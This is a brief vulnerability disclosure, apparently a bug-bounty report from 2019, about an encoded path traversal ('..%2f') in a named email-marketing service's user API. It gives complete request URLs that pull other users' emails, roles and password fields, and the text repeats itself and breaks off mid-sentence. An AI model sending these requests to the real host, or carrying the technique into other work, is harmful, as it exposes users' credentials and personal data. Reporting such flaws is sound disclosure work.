Emma Users Information Leak via endpoint traversal

09 May 2019 - saltedfish

Step 1:

   visit https://settings.e2ma.net/ and login.

   visit https://settings.e2ma.net/api/user/..%2ftest1@root.com?fields=user_id,email,user_name_first,user_name_last,role,password here is endpoint when you use ..%2f,and you can visit other endpoint, this endpoint allowe get some information like email,passwrod,every sensitive data,So use ..%2f can get other user information, like:

https://settings.e2ma.net/api/user/..%2ftest1@root.com?fields=user_id,email,user_name_first,user_name_last,role,password

https://settings.e2ma.net/api/user/..%2ftest2@root.com?fields=user_id,email,user_name_first,user_name_last,role,password

   I just only have two email,so I can give you two user information for this demo!You can change test2@root.com to a different email address and get other user information like username password.

   But then I found can get other user email address via this endpoint,and Just need change 1900932, You can get another user’s email address,you can get everything information about this user in this endpoint: https://settings.e2ma.net/api/user/..%2ftest1@root.com?fields=user_id,email,user_name_first,user_name_last,role,password here is endpoint when you use ..%2f,You can also access other endpoints as well. so…this endpoint allowe get some information like email,passwrod,every sensitive data: